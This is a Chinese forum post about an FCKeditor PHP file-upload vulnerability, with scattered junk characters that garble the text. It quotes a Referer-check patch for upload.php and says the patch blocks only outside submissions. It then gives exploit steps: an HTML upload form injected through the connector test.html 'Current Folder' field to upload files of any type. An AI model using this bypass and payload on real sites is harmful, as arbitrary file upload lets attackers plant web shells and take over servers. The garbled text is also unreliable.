漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php. J7 Y: I" B) q/ [; Y
网上给出的修复方案是3 F% ]7 Q4 G9 O9 v, u
修复方法,删除FCK编辑器用其他的编辑器0 a8 ?4 m' p; T
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件; v. i r/ \. Y6 m2 l
在
0 p+ ~5 M5 Y5 }) p3 arequire(‘config.php’);
% R3 X; Z1 m* |: Drequire(‘util.php’);
. V5 _- V- R6 y的下面添加以下代码—————————–
, T$ h z& y7 |# d: J) K& f$ s, B//防止外部提交# E9 ^. I( M3 Q1 W
function outsidepost()
7 S: S' F# O, E. ]* W9 {9 u5 U/ f/ L/ |{
* h$ O, y; y, |$servername=$_SERVER['SERVER_NAME'];
" Z0 K% f0 O" v) z& E, E$sub_from=@$_SERVER['HTTP_REFERER'];, z8 v$ N( t/ j! j
$sub_len=strlen($servername);2 O* D. ]" H7 ~ Q3 h6 K
$checkfrom=substr($sub_from,7,$sub_len);
/ g5 b& v( B5 l) Wif($checkfrom!=$servername){
* m; A- `1 U$ C1 b: r# i" `echo(“you don’t outsidepost!”);" @4 d* c* a! ~, o, V- K! f$ D4 r
exit;5 @! P3 `& \% `5 o% s+ `
}' V$ L$ V. T2 u3 M3 ^0 o
}7 p" B! j4 A! ~4 Y9 I) J$ I }
outsidepost();
x& r! p1 D; |* B% r% g2 s防止外部提交,但是没有防止内部提交,4 _" _# X* H: F' ~* L
利用方法:7 u+ }! R* |9 \& G; G0 Z6 T
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html6 K3 }; A9 `! H6 G- A+ V5 M
2,在Current Folder 框输入
$ K6 D* @5 h* y$ R+ |3 a<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>" s$ _8 t& I# A3 z! g
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
. h, n/ A' X- N4 g N9 sPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对